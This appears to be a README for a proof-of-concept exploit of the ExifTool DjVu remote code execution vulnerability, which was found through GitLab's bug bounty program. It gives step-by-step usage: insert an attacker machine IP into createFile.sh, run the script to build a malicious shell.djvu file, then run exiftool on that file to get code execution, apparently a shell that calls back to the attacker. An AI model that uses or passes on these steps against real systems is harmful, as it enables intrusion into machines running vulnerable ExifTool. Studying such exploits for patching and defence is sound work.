Recently, the researcher wcbowling found a vulnerability in the Exiftool tool, that enabled a malicious actor to perform a Remote code Execution attack. This vulnerability was found in the Gitlab bug bounty program, where they use this tool as dependency for their product.
In line 12 (createFile.sh), put your own attacker machine IP address.
Then simply execute:
$ bash createFile.sh
This will create the malicious file shell.djvu
. By using exiftool, you can get remote code execution:
$ sudo /usr/local/bin/exiftool shell.djvu